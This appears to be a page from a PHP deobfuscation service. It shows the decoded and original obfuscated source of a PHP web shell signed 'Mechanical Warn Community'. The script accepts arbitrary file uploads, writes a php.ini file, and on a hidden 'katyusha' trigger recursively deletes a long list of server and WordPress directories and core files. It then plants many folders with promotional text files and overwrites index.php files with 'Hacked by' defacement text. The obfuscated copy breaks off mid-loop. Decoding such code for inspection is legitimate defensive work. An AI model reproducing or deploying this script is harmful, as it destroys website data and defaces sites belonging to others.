Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

$si_prefix = array("\102", "\113\102", "\115\102", "\107\x42", "\x54\x42", "\x50\102", "\1..

Decoded Output download

<?  $si_prefix = array("B", "KB", "MB", "GB", "TB", "PB", "EB", "ZB", "YB");   
 $current_file_name = basename($_SERVER["PHP_SELF"]); 
 
$bytes = disk_free_space(".");  
if (isset($_POST["upload"])) {  
	if (is_writable($root)) {  
		if (@copy($_FILES["idx_file"]["tmp_name"], $dest)) {  
			$web = "http://" . $_SERVER["HTTP_HOST"] . "/";  
			echo "sukses upload => <a href='{$web}/{$files}' target='_blank'><u>{$web}/{$files}</u></a>"; }  
		else { echo "gagal upload di document root."; } }  
	else { if (@copy($_FILES["idx_file"]["tmp_name"], $files)) {  
		echo "sukses upload <b>{$files}</b> di folder ini"; }  
	else { echo "gagal upload"; } } } 
	if (isset($_GET["katyusha"])) {  
		echo "<br>Progres :<br>";  
		set_time_limit(7000);  
		$dir = array("../Mechanical Warn/", "../usr/", "../bin/", "../etc/", "../logs/", "../mail/", "../php/", "../public_ftp/", "../public_html/", "../ssl/", "../ssl/certs/", "../ssl/csrs/", "../ssl/keys/", "../tmp/", "../tmp/analog/", "../var/", "../var/cpanel/", "/public_html/", "public_html/", "Mechanical Warn/", "sistem/", "system/", "system/core/", "system/core/compat/", "system/database/", "system/database/drivers/", "system/fonts/", "system/helpers/", "system/language/", "system/language/english/", "system/libraries/", "system/libraries/Cache/", "system/libraries/Javascript/", "system/libraries/Session/", "application/", "application/cache/", "application/config/", "application/controllers/", "application/core/", "application/helpers/", "application/hooks/", "application/language/", "application/language/english/", "application/libraries/", "application/logs/", "application/models/", "application/third_party/", "application/third_party/fpdf/", "application/views/", "application/views/auth/", "application/views/login/", "application/views/errors/", "application/views/template/", "assets/", "assets/js/", "assets/css/", "assets/file/", "assets/files/", "assets/img/", "assets/image/", "assets/upload/", "assets/uploads/", "app/", "app/commands/", "app/config/", "app/config/local/", "app/config/packages/", "app/config/testing/", "app/controllers/", "app/database/", "app/database/migrations/", "app/database/seeds/", "app/lang/", "app/lang/en/", "app/models/", "app/start/", "app/storage/", "app/storage/cache/", "app/storage/logs/", "app/storage/meta/", "app/storage/session/", "app/storage/views/", "app/test/", "app/views/", "app/views/emails/", "app/views/emails/auth/", "bootstrap/", "public/", "public/packages/", "build/", "build/controllers/", "build/controllers/views/", "build/controllers/views/translation/", "contrib/", "contrib/completion/", "contrib/completion/bash/", "contrib/completion/zsh/", "cs/", "cs/src/", "docs/", "docs/guide/", "docs/guide/images/", "framework/", "framework/assets/", "framework/base/", "framework/behaviors/", "framework/console/", "framework/console/controllers/", "framework/console/runtime/", "framework/console/widgets/", "framework/data/", "framework/db/", "framework/db/conditions/", "framework/db/cubrid/", "framework/db/mssql/", "framework/db/mysql/", "framework/db/oci/", "framework/db/pgsql/", "framework/db/sqlite/", "framework/views/", "framework/views/errorHandler/", "framework/web/", "framework/web/migrations/", "tests/", "tests/assets/", "tests/cubrid/", "tests/data/", "tests/data/base/", "tests/data/console/", "tests/data/controllers/", "tests/data/views/", "tests/data/views/widgets/", "tests/data/web/", "tests/data/web/assets/", "tests/data/web/assetSources/", "tests/framework/", "tests/js/", "tests/mssql/", "tests/runtime/", "wp-admin/", "wp-admin/css/", "wp-admin/css/colors/", "wp-admin/css/colors/blue/", "wp-admin/css/colors/coffee/", "wp-admin/css/colors/light/", "wp-admin/css/colors/ectoplasm/", "wp-admin/css/colors/midnight/", "wp-admin/css/colors/ocean/", "wp-admin/css/colors/sunrise/", "wp-admin/images/", "wp-admin/includes/", "wp-admin/js/", "wp-admin/js/widgets/", "wp-admin/maint/", "wp-admin/network/", "wp-admin/user/", "wp-content/", "wp-content/cache/", "wp-content/cache/log/", "wp-content/cache/minify/", "wp-content/cache/page_enchanced/", "wp-content/cache/tmp/", "wp-content/cache/wph/", "wp-content/languages/", "wp-content/languages/plugins/", "wp-content/languages/themes/", "wp-content/mu-plugins/", "wp-content/plugins/", "wp-content/themes/", "wp-content/upgrade/", "wp-content/uploads/", "wp-content/uploads/2017/", "wp-content/uploads/2018/", "wp-content/uploads/2019/", "wp-content/uploads/2020/", "wp-includes/", "wp-includes/blocks/", "wp-includes/certificates/", "wp-includes/css/", "wp-includes/customize/", "wp-includes/fonts/", "wp-includes/ID3/", "wp-includes/images/", "wp-includes/IXR/", "wp-includes/js/", "wp-includes/pomo/", "wp-includes/random_compat/", "wp-includes/Requests/", "wp-includes/widgets/", "admin/");  
		$mn = fopen("php.ini", "w") or die("Unable to open file!"); 
		$txt = "open_basedir = ../public_html/";  
		fwrite($mn, $txt); fclose($mn); echo "Success Create php.ini";  
 
		function emptyDir($dir) { if (is_dir($dir)) { $scn = scandir($dir); foreach ($scn as $files) { if ($files !== ".") { if ($files !== "..") { if (!is_dir($dir . "/" . $files)) { unlink($dir . "/" . $files); } else { emptyDir($dir . "/" . $files); rmdir($dir . "/" . $files); } } } } } } foreach ($dir as $dld) { emptyDir($dld); 
			@rmdir($dld);  
		}  
		echo "<br>All Dir Deleted<br>";  
 
		$wp = array("wp-activate.php", "wp-blog-header.php", "wp-comments-post.php", "wp-config-sample.php", "wp-cron.php", "wp-link-opml.php", "wp-login.php", "wp-load.php", "wp-mail.php", "wp-settings.php", "wp-signup.php", "wp-trackback.php", "xmlrpc.php"); 
		foreach ($wp as $dlp) { @unlink($dlp); }  
		for ($j = 0; $j <= 100; $j++) {  
			$chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";  
			$xs = substr(str_shuffle($chars), 5);  
			foreach ($dir as $kk) { mkdir($kk . $j . $xs, 256, true);  
				chmod($kk . $j . $xs, 256);  
				$mk = $kk . $j . $xs; 
				$var = fopen($mk . "/Mechanical Warn Community.txt", "a+");  
 
				fwrite($var, "Visit Us on https://mechanicalwarn.com");  
				chmod($mk . "/Mechanical Warn Community.txt", 292); } }  
				echo "All Dir Rebuild & Injected<br>";  
 
				for ($y = 0; $y <= 100; $y++) { $kc = $_SERVER["DOCUMENT_ROOT"];  
					mkdir($kc . $y . "Mechanical Warn Community", 256, true);  
				chmod($kc . $y . "Mechanical Warn Community", 256);  
				$mk = $kc . $y . "Mechanical Warn Community";  
				$var = fopen($mk . "/Mechanical Warn Community.txt", "a+");  
				fwrite($var, "Visit Us on https://mechanicalwarn.com");  
				chmod($mk . "/Mechanical Warn Community.txt", 292);  
				$mn = "index.php";  
				$tx = "Hacked by./Mh@nkk
Mechanical Warn Community
";  
				file_put_contents($mn, $tx, LOCK_EX); }  
				foreach ($dir as $dir_) { $path = "{$dir_}";  
				$filename = "index.php";  
				$location = "{$path}/{$filename}";  
				$isi = "Hacked by./Mh@nkk
Mechanical Warn Community\xa";  
				file_put_contents($location, $isi); }  
				echo "All Index Injected"; } goto BWpTW; fgHug: ?>

Did this file decode correctly?

Original Code

$si_prefix = array("\102", "\113\102", "\115\102", "\107\x42", "\x54\x42", "\x50\102", "\105\x42", "\132\102", "\x59\x42");  
 $current_file_name = basename($_SERVER["\x50\110\x50\137\x53\105\x4c\x46"]);

$bytes = disk_free_space("\x2e"); 
if (isset($_POST["\165\x70\154\x6f\141\x64"])) { 
	if (is_writable($root)) { 
		if (@copy($_FILES["\x69\x64\x78\137\x66\151\x6c\145"]["\x74\x6d\160\137\156\141\155\145"], $dest)) { 
			$web = "\x68\x74\164\x70\x3a\57\57" . $_SERVER["\x48\x54\x54\x50\x5f\x48\117\123\x54"] . "\x2f"; 
			echo "\x73\165\153\163\145\x73\40\x75\160\x6c\157\141\144\x20\x3d\x3e\40\x3c\141\40\150\x72\x65\x66\75\x27{$web}\x2f{$files}\47\40\x74\x61\x72\147\x65\164\75\x27\x5f\142\x6c\141\x6e\153\47\76\x3c\x75\x3e{$web}\57{$files}\x3c\x2f\x75\76\74\x2f\x61\76"; } 
		else { echo "\147\141\x67\x61\x6c\x20\x75\160\154\157\x61\x64\x20\x64\x69\40\x64\157\x63\165\155\145\156\x74\x20\x72\x6f\x6f\x74\x2e"; } } 
	else { if (@copy($_FILES["\x69\144\170\137\x66\151\x6c\145"]["\x74\155\160\x5f\x6e\x61\155\x65"], $files)) { 
		echo "\163\x75\x6b\x73\145\163\40\x75\160\x6c\157\141\x64\40\74\x62\x3e{$files}\x3c\x2f\142\x3e\40\144\x69\x20\146\157\x6c\x64\145\x72\40\151\156\151"; } 
	else { echo "\147\141\147\x61\x6c\x20\x75\160\x6c\x6f\x61\144"; } } }
	if (isset($_GET["\153\x61\x74\x79\x75\163\150\x61"])) { 
		echo "\74\142\162\x3e\x50\x72\157\x67\x72\x65\x73\40\x3a\74\x62\x72\x3e"; 
		set_time_limit(7000); 
		$dir = array("\x2e\x2e\57\115\145\x63\x68\141\x6e\151\x63\x61\154\x20\127\141\x72\156\x2f", "\x2e\56\x2f\x75\163\162\57", "\x2e\x2e\57\x62\151\156\x2f", "\56\x2e\x2f\x65\164\x63\x2f", "\56\56\x2f\154\x6f\x67\163\x2f", "\x2e\x2e\x2f\155\x61\x69\x6c\x2f", "\56\56\57\x70\x68\x70\57", "\56\x2e\x2f\160\x75\x62\154\x69\143\x5f\146\x74\x70\x2f", "\56\56\x2f\x70\x75\x62\x6c\151\x63\x5f\150\x74\x6d\154\x2f", "\56\56\57\x73\x73\x6c\57", "\x2e\56\57\163\163\154\57\x63\145\162\x74\x73\x2f", "\x2e\56\57\163\x73\154\57\x63\x73\162\163\57", "\56\56\57\163\x73\x6c\x2f\153\x65\171\163\x2f", "\56\x2e\x2f\164\x6d\x70\57", "\x2e\x2e\x2f\x74\155\x70\x2f\x61\x6e\x61\154\x6f\147\57", "\x2e\x2e\x2f\x76\x61\162\x2f", "\56\56\57\x76\x61\162\57\143\160\x61\x6e\145\x6c\57", "\x2f\160\x75\142\154\x69\x63\x5f\x68\x74\155\154\57", "\x70\165\x62\154\151\143\137\x68\164\155\x6c\57", "\115\x65\143\x68\x61\x6e\x69\x63\141\154\40\127\141\162\x6e\57", "\163\151\163\x74\145\x6d\x2f", "\163\x79\163\164\145\x6d\57", "\x73\x79\x73\164\x65\155\57\x63\157\x72\x65\57", "\163\171\x73\x74\145\155\x2f\143\x6f\x72\x65\57\143\157\x6d\x70\x61\164\x2f", "\x73\x79\163\x74\x65\155\x2f\x64\141\164\141\142\141\x73\145\x2f", "\163\x79\163\x74\x65\155\x2f\144\x61\164\x61\x62\141\x73\145\x2f\144\x72\x69\166\145\x72\x73\x2f", "\x73\x79\163\x74\145\x6d\x2f\146\x6f\156\164\x73\x2f", "\163\171\163\164\x65\155\57\150\145\x6c\x70\145\162\x73\x2f", "\x73\171\163\164\145\x6d\x2f\154\141\156\x67\x75\x61\147\145\x2f", "\x73\x79\163\164\x65\155\x2f\154\x61\x6e\147\x75\x61\147\145\x2f\145\156\147\x6c\x69\163\150\57", "\163\171\x73\164\x65\155\57\x6c\151\142\162\141\162\151\145\163\x2f", "\163\171\163\x74\x65\x6d\x2f\x6c\151\x62\x72\141\x72\151\145\x73\57\103\141\143\150\x65\57", "\x73\171\x73\164\x65\155\57\154\x69\142\x72\141\x72\151\x65\163\57\x4a\x61\166\141\163\143\x72\151\x70\164\x2f", "\163\x79\x73\x74\145\155\x2f\154\x69\142\162\141\162\x69\145\163\x2f\x53\x65\163\163\151\157\x6e\57", "\x61\x70\x70\154\151\x63\141\x74\x69\157\x6e\x2f", "\x61\x70\160\154\151\143\141\x74\151\157\156\57\x63\x61\x63\x68\x65\57", "\141\160\160\154\x69\x63\141\x74\x69\157\x6e\57\143\157\x6e\146\151\147\x2f", "\x61\x70\x70\x6c\x69\x63\141\164\151\157\x6e\57\143\157\x6e\164\x72\157\x6c\154\x65\x72\x73\x2f", "\141\160\x70\154\151\x63\x61\164\151\157\156\57\143\x6f\162\x65\57", "\141\x70\160\154\x69\x63\x61\164\x69\157\156\x2f\x68\x65\x6c\x70\x65\x72\x73\x2f", "\x61\x70\160\x6c\151\143\x61\x74\151\x6f\156\57\150\x6f\157\153\163\x2f", "\141\160\160\x6c\x69\x63\x61\164\x69\157\x6e\x2f\x6c\141\156\x67\x75\x61\147\145\x2f", "\x61\x70\160\154\151\x63\141\164\x69\x6f\x6e\x2f\154\141\156\x67\165\x61\x67\x65\x2f\x65\x6e\x67\x6c\x69\x73\150\x2f", "\141\x70\x70\154\x69\143\141\x74\x69\x6f\156\57\154\x69\142\162\x61\162\151\x65\163\57", "\141\x70\x70\x6c\151\x63\141\x74\151\x6f\156\57\x6c\x6f\x67\163\57", "\x61\160\160\x6c\x69\143\x61\x74\x69\157\156\x2f\155\157\144\145\x6c\x73\x2f", "\x61\160\160\x6c\x69\x63\141\x74\x69\157\156\57\164\150\x69\x72\144\137\x70\141\x72\164\x79\x2f", "\x61\160\x70\x6c\151\x63\141\164\x69\157\156\x2f\x74\150\151\162\144\x5f\160\141\x72\164\x79\x2f\146\160\144\x66\57", "\x61\160\160\154\x69\x63\x61\x74\x69\157\x6e\x2f\x76\151\145\x77\x73\x2f", "\x61\160\160\x6c\x69\143\141\164\151\157\156\x2f\x76\x69\x65\x77\x73\57\141\165\164\x68\57", "\141\160\x70\154\151\143\141\164\x69\x6f\x6e\x2f\x76\x69\145\167\163\x2f\154\157\x67\151\156\57", "\141\x70\160\x6c\151\143\141\164\x69\x6f\156\x2f\x76\x69\x65\167\x73\57\x65\162\x72\157\162\x73\57", "\x61\160\x70\x6c\151\x63\141\x74\151\x6f\156\x2f\x76\x69\x65\167\x73\x2f\164\x65\x6d\160\154\141\164\145\57", "\x61\163\x73\145\164\x73\57", "\x61\163\x73\x65\164\163\x2f\152\x73\x2f", "\x61\x73\x73\145\x74\163\57\143\x73\x73\57", "\x61\x73\x73\x65\x74\x73\x2f\146\x69\x6c\145\57", "\x61\x73\x73\x65\164\x73\x2f\146\151\154\145\x73\57", "\x61\x73\x73\145\x74\163\x2f\151\155\147\x2f", "\141\163\163\145\x74\163\57\x69\155\x61\147\145\57", "\141\x73\x73\145\164\x73\x2f\165\160\x6c\157\x61\x64\57", "\141\x73\163\x65\164\x73\57\165\160\x6c\157\141\x64\163\x2f", "\x61\x70\x70\57", "\141\x70\160\57\x63\x6f\155\155\x61\x6e\144\x73\x2f", "\x61\160\160\57\x63\157\156\146\151\x67\57", "\141\x70\160\x2f\143\157\x6e\x66\x69\x67\57\x6c\157\x63\x61\154\57", "\x61\160\x70\x2f\x63\157\156\146\151\x67\57\x70\141\143\153\x61\x67\x65\x73\x2f", "\x61\x70\x70\57\143\x6f\156\146\151\x67\57\164\x65\163\164\x69\156\147\x2f", "\141\160\x70\57\143\157\x6e\x74\x72\157\154\154\145\162\x73\57", "\141\160\x70\57\x64\141\164\x61\x62\x61\x73\x65\x2f", "\141\x70\x70\57\144\141\164\x61\x62\141\x73\145\x2f\x6d\x69\147\162\141\x74\x69\x6f\x6e\163\x2f", "\141\160\x70\x2f\x64\x61\164\141\x62\x61\163\145\57\x73\x65\145\144\163\57", "\x61\x70\x70\x2f\154\x61\156\147\57", "\x61\x70\x70\57\154\141\156\x67\x2f\x65\x6e\57", "\141\160\160\57\155\157\144\145\x6c\x73\57", "\141\x70\x70\57\x73\x74\x61\162\x74\x2f", "\x61\160\x70\x2f\163\164\157\x72\x61\x67\x65\x2f", "\141\160\x70\x2f\163\x74\x6f\x72\x61\147\145\57\x63\x61\x63\x68\145\x2f", "\x61\x70\160\57\x73\x74\157\162\x61\147\145\x2f\x6c\157\147\163\x2f", "\141\160\160\x2f\163\164\157\x72\141\x67\x65\57\x6d\145\164\x61\57", "\x61\x70\160\x2f\163\x74\157\162\x61\147\145\57\x73\145\x73\163\151\157\156\x2f", "\141\160\x70\57\x73\164\157\162\x61\x67\x65\57\x76\x69\145\167\163\x2f", "\141\x70\x70\x2f\164\145\163\164\x2f", "\141\x70\x70\57\166\x69\145\x77\x73\57", "\141\x70\160\x2f\166\151\x65\x77\x73\x2f\x65\155\x61\151\154\163\x2f", "\x61\x70\160\57\x76\x69\x65\167\163\57\145\x6d\141\x69\154\163\57\x61\x75\x74\150\x2f", "\142\157\x6f\x74\163\164\162\141\x70\57", "\x70\x75\x62\x6c\x69\143\57", "\x70\x75\x62\154\x69\143\57\160\x61\x63\x6b\141\147\x65\x73\x2f", "\x62\165\151\x6c\144\x2f", "\x62\x75\151\x6c\x64\x2f\143\157\156\164\x72\x6f\154\x6c\x65\162\x73\x2f", "\142\x75\151\154\x64\57\143\x6f\156\164\x72\x6f\154\154\145\x72\x73\57\166\151\x65\x77\x73\x2f", "\x62\x75\x69\154\144\57\x63\x6f\x6e\164\x72\157\154\x6c\x65\x72\x73\x2f\166\151\145\x77\x73\x2f\x74\x72\141\156\x73\x6c\141\x74\151\x6f\156\x2f", "\x63\157\156\x74\x72\151\x62\57", "\x63\x6f\156\164\162\151\x62\x2f\143\157\x6d\x70\x6c\145\164\x69\157\x6e\x2f", "\143\x6f\156\164\162\x69\142\57\x63\x6f\x6d\x70\x6c\x65\x74\151\157\x6e\x2f\x62\x61\x73\150\57", "\143\x6f\x6e\x74\x72\x69\142\57\x63\157\155\160\154\145\x74\151\157\156\57\x7a\163\150\57", "\x63\163\x2f", "\143\163\x2f\163\162\x63\x2f", "\144\157\x63\163\x2f", "\x64\x6f\x63\x73\57\x67\x75\151\x64\145\x2f", "\144\157\x63\x73\57\147\x75\x69\x64\x65\57\x69\155\141\x67\x65\x73\x2f", "\146\162\141\x6d\x65\167\x6f\162\153\57", "\x66\162\141\155\145\167\x6f\162\153\57\141\163\x73\x65\x74\163\57", "\x66\162\x61\155\x65\167\x6f\x72\153\57\142\141\x73\x65\x2f", "\x66\x72\x61\x6d\145\167\157\x72\x6b\x2f\142\x65\x68\141\166\151\157\162\163\x2f", "\x66\162\x61\x6d\145\x77\x6f\162\153\x2f\x63\157\156\x73\x6f\154\x65\57", "\x66\x72\141\x6d\x65\x77\x6f\x72\153\x2f\x63\x6f\x6e\163\157\x6c\x65\x2f\x63\157\x6e\x74\162\x6f\154\x6c\x65\162\163\x2f", "\x66\x72\141\x6d\x65\167\x6f\x72\153\x2f\x63\157\x6e\163\157\x6c\145\57\x72\x75\x6e\164\151\x6d\145\57", "\146\x72\x61\x6d\145\167\157\162\153\x2f\x63\x6f\x6e\x73\157\x6c\145\57\x77\x69\144\147\x65\164\x73\57", "\146\x72\x61\x6d\145\167\x6f\162\x6b\x2f\144\141\x74\x61\x2f", "\x66\162\x61\x6d\145\167\157\162\153\x2f\144\142\x2f", "\x66\x72\x61\155\x65\x77\x6f\162\153\57\144\x62\x2f\143\x6f\x6e\x64\x69\164\151\x6f\156\163\57", "\x66\x72\x61\x6d\145\x77\x6f\x72\153\x2f\144\x62\x2f\x63\x75\142\x72\x69\x64\57", "\146\x72\x61\155\x65\167\x6f\x72\x6b\57\x64\142\x2f\x6d\163\163\x71\x6c\57", "\146\x72\141\155\x65\x77\x6f\x72\x6b\x2f\144\x62\x2f\155\x79\163\161\154\57", "\x66\x72\141\x6d\145\x77\x6f\x72\x6b\57\144\142\57\x6f\x63\151\57", "\146\162\141\155\x65\167\x6f\162\153\x2f\x64\142\57\160\147\163\x71\x6c\x2f", "\x66\162\141\155\x65\x77\157\x72\153\57\x64\x62\x2f\x73\x71\x6c\151\x74\145\57", "\x66\162\x61\155\x65\x77\157\x72\153\57\x76\x69\145\x77\163\x2f", "\x66\x72\141\x6d\x65\167\157\162\153\57\166\151\145\167\x73\x2f\x65\x72\x72\x6f\162\x48\x61\156\x64\154\x65\x72\57", "\146\x72\x61\x6d\x65\x77\x6f\x72\x6b\57\167\145\x62\57", "\x66\x72\141\155\x65\167\x6f\162\x6b\x2f\167\x65\142\57\155\x69\x67\x72\x61\164\151\157\156\x73\x2f", "\x74\145\x73\164\163\57", "\x74\145\163\x74\x73\57\x61\x73\163\145\164\x73\57", "\164\x65\x73\x74\163\x2f\x63\165\142\x72\151\144\x2f", "\164\145\163\x74\163\57\144\x61\164\x61\57", "\164\145\163\x74\163\x2f\144\x61\164\x61\57\142\141\x73\145\57", "\164\x65\x73\164\x73\x2f\x64\x61\x74\x61\57\143\157\156\163\157\154\145\57", "\x74\x65\163\164\x73\57\144\x61\x74\x61\x2f\143\x6f\156\x74\x72\157\154\x6c\x65\162\163\x2f", "\164\x65\x73\x74\x73\57\144\141\164\141\x2f\x76\x69\x65\167\163\x2f", "\x74\x65\163\164\x73\57\144\141\164\x61\57\166\151\x65\167\163\57\x77\x69\144\x67\x65\164\163\x2f", "\164\x65\x73\164\163\x2f\x64\x61\x74\141\x2f\167\x65\142\x2f", "\164\x65\x73\164\x73\x2f\144\x61\x74\141\57\x77\145\x62\57\141\163\163\145\164\163\57", "\x74\145\x73\164\x73\x2f\x64\x61\164\141\57\x77\145\142\x2f\x61\x73\x73\x65\164\123\157\x75\162\143\x65\163\x2f", "\x74\x65\x73\164\163\x2f\x66\162\x61\x6d\145\x77\157\162\153\57", "\164\x65\163\164\x73\x2f\x6a\x73\57", "\164\145\x73\164\x73\x2f\x6d\x73\x73\x71\154\x2f", "\164\145\x73\164\x73\x2f\162\165\156\x74\151\155\x65\57", "\x77\160\x2d\141\x64\155\x69\156\57", "\x77\160\55\141\x64\x6d\151\x6e\57\x63\x73\163\57", "\167\x70\55\x61\x64\x6d\x69\156\x2f\143\x73\x73\x2f\x63\x6f\x6c\x6f\x72\x73\57", "\167\160\55\141\144\x6d\x69\156\57\x63\x73\163\x2f\x63\157\154\157\x72\163\x2f\x62\x6c\x75\145\57", "\167\x70\x2d\141\x64\155\151\156\57\143\x73\x73\x2f\x63\157\154\157\x72\163\x2f\x63\157\x66\146\145\145\x2f", "\x77\x70\x2d\x61\144\155\151\156\57\143\163\x73\57\143\157\x6c\157\x72\x73\x2f\x6c\x69\x67\x68\x74\x2f", "\x77\160\x2d\x61\144\x6d\x69\156\x2f\143\163\163\57\x63\x6f\154\157\x72\163\57\x65\143\164\157\x70\x6c\x61\163\x6d\x2f", "\x77\x70\x2d\141\x64\155\x69\x6e\x2f\x63\x73\x73\x2f\x63\x6f\154\x6f\162\163\x2f\x6d\151\144\x6e\x69\147\150\164\57", "\x77\160\55\141\144\155\x69\156\x2f\x63\163\163\57\143\157\x6c\x6f\162\163\x2f\x6f\x63\145\x61\x6e\x2f", "\x77\x70\55\141\144\155\151\156\x2f\x63\x73\x73\57\x63\157\154\157\162\x73\57\x73\165\x6e\162\151\x73\145\57", "\167\160\x2d\141\144\155\151\x6e\x2f\x69\155\141\147\x65\x73\57", "\x77\160\x2d\x61\144\155\151\156\x2f\x69\x6e\x63\154\x75\144\x65\163\57", "\x77\x70\x2d\x61\144\155\x69\x6e\57\152\x73\x2f", "\167\160\x2d\141\144\x6d\x69\156\x2f\152\x73\x2f\x77\x69\x64\147\x65\164\x73\x2f", "\x77\160\55\141\144\x6d\151\156\57\x6d\141\151\x6e\x74\x2f", "\x77\160\x2d\141\144\x6d\x69\156\57\x6e\145\164\167\x6f\x72\153\57", "\167\160\x2d\x61\x64\155\x69\x6e\x2f\x75\x73\x65\162\x2f", "\167\x70\55\x63\157\156\x74\145\x6e\x74\x2f", "\x77\160\55\x63\157\156\164\x65\x6e\164\57\143\141\x63\150\145\57", "\167\x70\55\143\157\x6e\x74\x65\156\164\57\x63\x61\x63\x68\x65\57\x6c\157\147\57", "\x77\x70\55\x63\x6f\156\164\145\156\x74\x2f\x63\141\x63\150\x65\x2f\x6d\x69\x6e\x69\x66\171\57", "\167\160\x2d\x63\157\156\164\145\x6e\164\57\x63\141\143\x68\145\x2f\x70\x61\147\145\137\145\156\143\150\x61\156\143\145\144\57", "\167\160\x2d\x63\157\156\x74\x65\x6e\x74\57\143\141\143\150\x65\57\164\x6d\x70\x2f", "\x77\160\55\143\157\x6e\x74\145\156\164\57\x63\141\x63\x68\145\x2f\167\160\x68\57", "\x77\x70\55\x63\157\156\x74\x65\156\164\57\x6c\141\x6e\x67\165\141\147\x65\163\x2f", "\167\x70\x2d\x63\x6f\156\x74\145\156\164\x2f\x6c\141\x6e\x67\165\141\147\145\x73\x2f\x70\154\x75\x67\151\156\163\57", "\167\160\55\x63\157\156\x74\145\156\164\57\154\141\x6e\147\x75\141\x67\145\163\57\164\150\145\155\145\x73\x2f", "\x77\x70\55\x63\x6f\x6e\x74\145\156\164\x2f\x6d\165\x2d\x70\154\x75\x67\x69\156\163\x2f", "\x77\160\55\143\x6f\x6e\x74\145\x6e\164\57\x70\x6c\165\147\x69\x6e\163\x2f", "\x77\160\55\143\157\x6e\x74\x65\156\x74\57\164\150\x65\155\145\x73\x2f", "\x77\160\55\143\157\156\164\145\x6e\164\x2f\165\160\x67\x72\141\x64\145\x2f", "\x77\x70\x2d\x63\x6f\156\x74\145\156\164\x2f\165\160\x6c\157\x61\x64\163\x2f", "\x77\x70\x2d\x63\x6f\156\164\145\x6e\164\57\x75\x70\154\157\141\144\163\57\x32\x30\61\67\57", "\167\x70\x2d\143\157\x6e\164\145\156\164\x2f\165\x70\x6c\x6f\x61\x64\x73\x2f\x32\x30\61\x38\x2f", "\x77\160\55\x63\157\156\x74\145\156\x74\57\165\x70\154\157\x61\x64\163\57\x32\x30\x31\x39\x2f", "\167\160\x2d\x63\157\156\x74\145\156\x74\57\x75\x70\x6c\157\x61\x64\163\57\62\60\x32\x30\x2f", "\x77\160\x2d\151\156\x63\x6c\165\144\145\x73\x2f", "\167\x70\55\x69\x6e\143\x6c\x75\144\x65\x73\57\x62\x6c\157\x63\153\163\x2f", "\x77\x70\x2d\151\x6e\143\154\x75\144\145\x73\57\143\x65\x72\164\x69\146\151\x63\141\x74\145\163\x2f", "\167\x70\x2d\x69\x6e\143\154\165\144\145\x73\x2f\x63\x73\x73\57", "\167\160\x2d\x69\156\x63\154\x75\144\x65\x73\57\x63\165\163\x74\157\155\151\172\145\57", "\167\x70\x2d\x69\x6e\x63\x6c\x75\x64\145\x73\x2f\x66\x6f\x6e\164\x73\57", "\167\x70\x2d\x69\156\143\154\x75\144\145\x73\x2f\111\104\63\x2f", "\x77\x70\55\x69\156\143\154\165\144\145\163\x2f\x69\155\x61\x67\x65\x73\57", "\x77\160\55\x69\156\x63\x6c\x75\x64\145\x73\57\111\130\122\57", "\x77\x70\x2d\x69\x6e\143\x6c\x75\x64\x65\163\57\152\163\57", "\x77\160\x2d\x69\156\143\154\165\x64\x65\163\x2f\160\157\155\x6f\x2f", "\x77\160\x2d\151\156\x63\x6c\165\144\x65\x73\x2f\162\x61\x6e\144\x6f\155\137\143\157\155\160\141\164\57", "\x77\160\x2d\x69\156\x63\x6c\165\144\x65\163\57\122\x65\x71\165\x65\163\x74\x73\x2f", "\167\160\x2d\151\156\x63\154\x75\144\145\x73\x2f\167\151\144\x67\145\164\163\57", "\141\x64\155\x69\x6e\x2f"); 
		$mn = fopen("\160\x68\x70\56\151\156\x69", "\167") or die("\x55\x6e\141\142\x6c\145\40\164\x6f\40\x6f\x70\145\156\x20\x66\x69\x6c\x65\41");
		$txt = "\x6f\x70\145\156\137\142\141\163\x65\x64\151\162\x20\x3d\40\x2e\56\x2f\160\x75\142\154\x69\x63\x5f\150\164\x6d\x6c\57"; 
		fwrite($mn, $txt); fclose($mn); echo "\123\x75\x63\143\145\x73\163\x20\103\162\x65\x61\164\145\40\160\x68\x70\x2e\x69\x6e\151"; 

		function emptyDir($dir) { if (is_dir($dir)) { $scn = scandir($dir); foreach ($scn as $files) { if ($files !== "\x2e") { if ($files !== "\x2e\x2e") { if (!is_dir($dir . "\x2f" . $files)) { unlink($dir . "\x2f" . $files); } else { emptyDir($dir . "\x2f" . $files); rmdir($dir . "\57" . $files); } } } } } } foreach ($dir as $dld) { emptyDir($dld);
			@rmdir($dld); 
		} 
		echo "\74\142\x72\76\x41\154\x6c\40\104\151\162\x20\x44\145\154\x65\x74\145\144\x3c\142\162\76"; 

		$wp = array("\x77\x70\x2d\x61\x63\x74\x69\166\x61\164\x65\56\x70\x68\x70", "\x77\160\x2d\142\x6c\x6f\x67\x2d\150\145\x61\x64\x65\162\x2e\x70\x68\160", "\167\x70\55\x63\157\x6d\x6d\x65\x6e\164\x73\x2d\160\x6f\x73\x74\x2e\x70\150\x70", "\167\160\55\143\157\156\x66\x69\x67\55\x73\141\155\160\x6c\145\56\160\x68\160", "\167\x70\55\143\x72\x6f\x6e\x2e\160\x68\x70", "\x77\160\x2d\154\x69\x6e\153\x2d\x6f\160\x6d\x6c\x2e\x70\150\160", "\x77\x70\55\154\x6f\x67\x69\156\56\160\x68\x70", "\167\x70\x2d\154\157\x61\144\56\160\x68\x70", "\167\x70\55\155\141\x69\154\x2e\160\x68\160", "\x77\160\55\163\145\164\164\x69\x6e\x67\163\x2e\160\150\160", "\167\160\55\x73\151\x67\156\165\x70\56\x70\150\x70", "\167\160\55\x74\162\141\143\153\142\x61\x63\x6b\x2e\x70\150\x70", "\170\155\x6c\162\x70\143\x2e\160\x68\160");
		foreach ($wp as $dlp) { @unlink($dlp); } 
		for ($j = 0; $j <= 100; $j++) { 
			$chars = "\141\142\x63\x64\x65\146\147\x68\x69\152\x6b\x6c\x6d\x6e\157\x70\161\162\x73\164\165\166\x77\170\x79\x7a\101\102\103\104\105\x46\107\x48\x49\112\113\114\x4d\x4e\117\x50\121\122\123\124\x55\x56\x57\130\x59\x5a\60\x31\62\x33\x34\x35\66\67\70\71"; 
			$xs = substr(str_shuffle($chars), 5); 
			foreach ($dir as $kk) { mkdir($kk . $j . $xs, 256, true); 
				chmod($kk . $j . $xs, 256); 
				$mk = $kk . $j . $xs;
